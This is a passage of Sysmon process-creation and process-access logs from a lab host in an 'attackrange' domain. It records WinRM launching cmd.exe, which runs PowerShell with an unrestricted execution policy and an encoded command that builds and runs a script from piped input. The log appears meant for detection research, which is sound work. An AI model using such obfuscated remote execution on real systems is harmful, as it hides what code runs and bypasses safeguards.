cABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nParentProcessId: 5044\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.741","ProcessGuid":"{41C8662E-20CF-5F25-0000-00108EF70700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-0010CCF40700}","ParentProcessId":"5044","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nSourceProcessId: 5044\r\nSourceThreadId: 2624\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","SourceProcessId":"5044","SourceThreadId":"2624","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00108EF70700}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00108EF70700}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM3